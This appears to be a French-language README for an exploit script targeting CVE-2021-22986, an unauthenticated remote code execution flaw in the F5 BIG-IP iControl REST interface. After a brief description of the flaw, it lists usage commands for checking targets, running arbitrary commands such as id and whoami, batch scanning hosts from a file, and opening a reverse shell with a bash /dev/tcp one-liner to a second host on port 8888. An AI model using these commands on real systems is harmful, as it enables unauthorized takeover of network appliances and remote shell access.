
CVE-2021-22986 & F5 BIG-IP RCE
Cette vulnérabilité permet à des attaquants non authentifiés ayant un accès réseau à l'interface REST iControl, via l'interface de gestion BIG-IP et les adresses IP self, d'exécuter des commandes système arbitraires, de créer ou supprimer des fichiers, et de désactiver des services. Cette vulnérabilité ne peut être exploitée qu'à travers le plan de contrôle et ne peut pas l'être via le plan de données. L'exploitation peut mener à un compromis complet du système. Le système BIG-IP en mode Appliance est également vulnérable.
Utilisation de base
python3 CVE_2021_22986.py

Vérification de vulnérabilité
python3 CVE_2021_22986.py -v true -u https://192.168.174.164

Exécution de commande :
python3 CVE_2021_22986.py -a true -u https://192.168.174.164 -c id

python3 CVE_2021_22986.py -a true -u https://192.168.174.164 -c whoami

Scan par lots
python3 CVE_2021_22986.py -s true -f check.txt

Reserve Shell
python3 CVE_2021_22986.py -r true -u https://192.168.174.164 -c "bash -i >&/dev/tcp/192.168.174.129/8888 0>&1"


python3 newpoc.py https://192.168.174.164

https://support.f5.com/csp/article/K03009991